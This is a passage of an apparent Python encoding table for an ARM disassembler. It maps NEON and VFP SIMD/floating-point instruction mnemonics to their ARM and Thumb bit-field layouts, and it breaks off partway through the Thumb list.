    ('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
    ('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
    ('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
    ('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
    ('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
    ('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
    ('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
    ('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
    ('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
    ('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
    ('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
    ('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
    ('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
    ('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
    ('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
    ('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
    ('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
    ('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
    ('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
    ('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
    ('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
    ('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
    ('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
    ('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
    ('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
    ('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
    ('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
    ('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
    ('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
    ('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
    ('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
    ('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
    ('VSQRT<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
    ('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
    ('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
    # element/structure store instructions (VST1..VST4)
    ('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
    ('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
    ('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
    ('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
    ('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
    ('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
    ('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
    ('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
    ('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
    ('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
    ('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
    ('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
    ('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
    ('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
    ('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
    ('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
    ('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
    ('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
    ('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
    ('VTRN<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
    ('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
]
VFP_Thumb = [
('VABA<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
('VABAL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
('VABD<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
('VABDL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
('VABD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
('VABS<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VADD<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,#0.0', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
('VCVT<c>.F64.F32 <Dd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
('VCVT<y><c>.F32.F16 <Sd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 0, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', 1, 1, 1, 0, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
